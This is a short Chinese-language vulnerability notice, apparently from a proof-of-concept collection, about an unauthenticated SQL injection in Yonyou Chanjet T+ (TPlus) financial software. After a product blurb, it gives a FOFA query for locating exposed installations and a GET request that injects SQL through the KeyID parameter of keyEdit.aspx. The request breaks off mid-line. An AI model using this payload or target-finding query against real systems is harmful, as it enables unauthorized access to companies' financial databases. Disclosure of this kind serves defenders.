》》》产品描述《《《  ‌用友畅捷通-TPlus‌是由用友集团成员企业畅捷通公司开发的一款企业级财务管理工具，旨在帮助企业实现财务管理的现代化和智能化。作为畅捷通旗下的核心产品，TPlus集成了财务核算、资金管理、预算控制等多项核心功能，通过自动化和智能化的手段，提高企

漏洞描述：该漏洞是由于畅捷通T的/tplus/UFAQD/keyEdit.asp接口处未对用户的输入进行过滤和校验，未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息fofa:app="畅捷通-TPlus"POC:GET/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preloa